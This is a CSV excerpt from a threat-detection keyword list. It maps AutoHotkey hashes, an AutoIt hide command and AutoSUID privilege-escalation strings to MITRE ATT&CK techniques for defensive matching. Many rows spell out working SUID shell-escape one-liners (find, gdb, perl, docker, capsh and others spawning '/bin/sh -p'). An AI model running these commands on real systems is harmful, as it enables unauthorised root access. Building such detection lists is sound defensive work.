"*c584ab8fbfa1702c36bab98e6e07b05585402ec00c2e44c245a9bd879ca049f0*",".{0,1000}c584ab8fbfa1702c36bab98e6e07b05585402ec00c2e44c245a9bd879ca049f0.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*d67778ebd40bff99e1f248b1612d64f70191632b64af60ea53403d2550f2d640*",".{0,1000}d67778ebd40bff99e1f248b1612d64f70191632b64af60ea53403d2550f2d640.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*d71ba928d2755294ac049a66949606ee82e0e0a7bbb87760ae9fd1bcf24c0b8c*",".{0,1000}d71ba928d2755294ac049a66949606ee82e0e0a7bbb87760ae9fd1bcf24c0b8c.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*d7646ca3a26760fe5633288d79d7b6a44cfc19a85c5315f94e0861963f1c601e*",".{0,1000}d7646ca3a26760fe5633288d79d7b6a44cfc19a85c5315f94e0861963f1c601e.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*dbf3490648efe876bd9a98d53e4d9110bf5e02a3914c0dd4b2a48db4a09799b5*",".{0,1000}dbf3490648efe876bd9a98d53e4d9110bf5e02a3914c0dd4b2a48db4a09799b5.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*dffda71c77c271cafc2f77aa007daea58f32a3562da3a3b924701117c058a336*",".{0,1000}dffda71c77c271cafc2f77aa007daea58f32a3562da3a3b924701117c058a336.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*e0e5f40f9ebdbdbb29d6084e448401335ae802bdfdbe3604abcabbb92baa0d35*",".{0,1000}e0e5f40f9ebdbdbb29d6084e448401335ae802bdfdbe3604abcabbb92baa0d35.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*e16e14a5902618298c24b6b6a2503d83d435bd647dcbdc2a20fa5f7285c57168*",".{0,1000}e16e14a5902618298c24b6b6a2503d83d435bd647dcbdc2a20fa5f7285c57168.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*e27a87c132686f3e27675a53a2bce7c65328ac148ed2d7e11aefd657224d7d20*",".{0,1000}e27a87c132686f3e27675a53a2bce7c65328ac148ed2d7e11aefd657224d7d20.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*e51ba62ce6bfed434f3402945a9aa89f4b312076dfc597b5cae6f25ea0525bc8*",".{0,1000}e51ba62ce6bfed434f3402945a9aa89f4b312076dfc597b5cae6f25ea0525bc8.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*e85105a9dafcfb10b38227ad4657d329e7ac579a19740e71e1a121919832c2a3*",".{0,1000}e85105a9dafcfb10b38227ad4657d329e7ac579a19740e71e1a121919832c2a3.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*e9f3756f811224b3500981a136dae2ddd79987a510c9f389b67168a7fa494fa8*",".{0,1000}e9f3756f811224b3500981a136dae2ddd79987a510c9f389b67168a7fa494fa8.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*eac0df3ecfc829ba940a7323d21b688896758df43df086ed0e886c68d6003d22*",".{0,1000}eac0df3ecfc829ba940a7323d21b688896758df43df086ed0e886c68d6003d22.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*f33996eaa68e8a7a5f5a6156b44af666049769bd021979a6ffb9abb29b45ea2b*",".{0,1000}f33996eaa68e8a7a5f5a6156b44af666049769bd021979a6ffb9abb29b45ea2b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*f5d2887adeaa87f28d30174552b1ec976d302e7c804faa3e8ce74ddb0dda6c78*",".{0,1000}f5d2887adeaa87f28d30174552b1ec976d302e7c804faa3e8ce74ddb0dda6c78.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*f815e34b79e1357b7defc86d467077293f56b4cac373394c01a66adabacf3350*",".{0,1000}f815e34b79e1357b7defc86d467077293f56b4cac373394c01a66adabacf3350.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*f8b3dcc1c49da62b5302c64901e03eb6f15f0904fdf24e795bd8545e32d31604*",".{0,1000}f8b3dcc1c49da62b5302c64901e03eb6f15f0904fdf24e795bd8545e32d31604.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*f8c6eec28f90ec093e1b22cebe727abd2d408015f19944c9f2fea68d79a85673*",".{0,1000}f8c6eec28f90ec093e1b22cebe727abd2d408015f19944c9f2fea68d79a85673.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*f90226225d8c33b99efb6901942b695ca8e75d68a0ccf6000c1f0857b1b39251*",".{0,1000}f90226225d8c33b99efb6901942b695ca8e75d68a0ccf6000c1f0857b1b39251.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*www.autohotkey.com/download/*",".{0,1000}www\.autohotkey\.com\/download\/.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z"
"*start 'AutoIt3.exe' -a '*.a3x';attrib +h*",".{0,1000}start\s\'AutoIt3\.exe\'\s\-a\s\'.{0,1000}\.a3x\'\;attrib\s\+h.{0,1000}","greyware_tool_keyword","AutoIt","starting autoit script and hiding it","T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-14-IOCs-for-DarkGate-activity.txt","1","0","N/A","N/A","8","2","161","7","2024-08-29T15:27:38Z","2023-08-29T22:32:38Z"
"* pwn_tclsh.me*",".{0,1000}\spwn_tclsh\.me.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"* We have found at least * potential SUID exploitable file(s)*",".{0,1000}\sWe\shave\sfound\sat\sleast\s.{0,1000}\spotential\sSUID\sexploitable\sfile\(s\).{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./capsh --gid=0 --uid=0 --*",".{0,1000}\.\/capsh\s\-\-gid\=0\s\-\-uid\=0\s\-\-.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./chroot / /bin/sh -p*",".{0,1000}\.\/chroot\s\/\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./env /bin/sh -p*",".{0,1000}\.\/env\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./expect -c 'spawn /bin/sh -p;interact'*",".{0,1000}\.\/expect\s\-c\s\'spawn\s\/bin\/sh\s\-p\;interact\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./flock -u / /bin/sh -p*",".{0,1000}\.\/flock\s\-u\s\/\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./nice /bin/sh -p*",".{0,1000}\.\/nice\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./rview -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\.\/rview\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/ld.so /bin/sh -p*",".{0,1000}\/ld\.so\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/perf stat /bin/sh -p*",".{0,1000}\/perf\sstat\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/perl -e 'exec \""/bin/sh\""*",".{0,1000}\/perl\s\-e\s\'exec\s\\\""\/bin\/sh\\\"".{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/pwn_tclsh.me*",".{0,1000}\/pwn_tclsh\.me.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/rvim -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\/rvim\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/sshpass /bin/sh -p*",".{0,1000}\/sshpass\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/stdbuf -i0 /bin/sh -p*",".{0,1000}\/stdbuf\s\-i0\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/unshare -r /bin/sh*",".{0,1000}\/unshare\s\-r\s\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/view -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\/view\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/watch -x sh -c 'reset* exec sh 1>&0 2>&0*",".{0,1000}\/watch\s\-x\ssh\s\-c\s\'reset.{0,1000}\sexec\ssh\s1\>\&0\s2\>\&0.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*agetty -o -p -l /bin/sh -a root tty*",".{0,1000}agetty\s\-o\s\-p\s\-l\s\/bin\/sh\s\-a\sroot\stty.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*cpulimit -l 100 -f -- /bin/sh -p*",".{0,1000}cpulimit\s\-l\s100\s\-f\s\-\-\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*dmsetup create base <<EOF*0 3534848 linear /dev/loop0 94208* EOF*./dmsetup ls --exec '/bin/sh -p -s*",".{0,1000}dmsetup\screate\sbase\s\<\<EOF.{0,1000}0\s3534848\slinear\s\/dev\/loop0\s94208.{0,1000}\sEOF.{0,1000}\.\/dmsetup\sls\s\-\-exec\s\'\/bin\/sh\s\-p\s\-s.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*docker run -v /:/mnt --rm -it alpine chroot /mnt sh*",".{0,1000}docker\srun\s\-v\s\/\:\/mnt\s\-\-rm\s\-it\salpine\schroot\s\/mnt\ssh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*emacs -Q -nw --eval '(term \""/bin/sh -p\"")*",".{0,1000}emacs\s\-Q\s\-nw\s\-\-eval\s\'\(term\s\\\""\/bin\/sh\s\-p\\\""\).{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*'exec /bin/sh -p 0<&1' >> \$TF*",".{0,1000}\'exec\s\/bin\/sh\s\-p\s0\<\&1\'\s\>\>\s\\\$TF.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*find . -exec /bin/sh -p \; -quit*",".{0,1000}find\s\.\s\-exec\s\/bin\/sh\s\-p\s\\\;\s\-quit.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null*",".{0,1000}find\s\/\s\-xdev\s\-user\sroot\s\\\(\s\-perm\s\-4000\s\-o\s\-perm\s\-2000\s\-o\s\-perm\s\-6000\s\\\)\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*gdb -nx -ex 'python import os*os.execl(\""/bin/sh\*",".{0,1000}gdb\s\-nx\s\-ex\s\'python\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*genie -c '/bin/sh'*",".{0,1000}genie\s\-c\s\'\/bin\/sh\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*gimp -idf --batch-interpreter=python-fu-eval -b 'import os* os.execl(*/bin/sh*",".{0,1000}gimp\s\-idf\s\-\-batch\-interpreter\=python\-fu\-eval\s\-b\s\'import\sos.{0,1000}\sos\.execl\(.{0,1000}\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*ionice /bin/sh -p*",".{0,1000}ionice\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*logsave /dev/null /bin/sh -i -p*",".{0,1000}logsave\s\/dev\/null\s\/bin\/sh\s\-i\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*msgfilter -P /bin/sh -p -c '/bin/sh*",".{0,1000}msgfilter\s\-P\s\/bin\/sh\s\-p\s\-c\s\'\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*php -r \""pcntl_exec('/bin/sh'*",".{0,1000}php\s\-r\s\\\""pcntl_exec\(\'\/bin\/sh\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*rsync -e 'sh -p -c *sh 0<&2 1>&2*127.0.0.1:/dev/null*",".{0,1000}rsync\s\-e\s\'sh\s\-p\s\-c\s.{0,1000}sh\s0\<\&2\s1\>\&2.{0,1000}127\.0\.0\.1\:\/dev\/null.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*strace -o /dev/null /bin/sh -p*",".{0,1000}strace\s\-o\s\/dev\/null\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*taskset 1 /bin/sh -p*",".{0,1000}taskset\s1\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
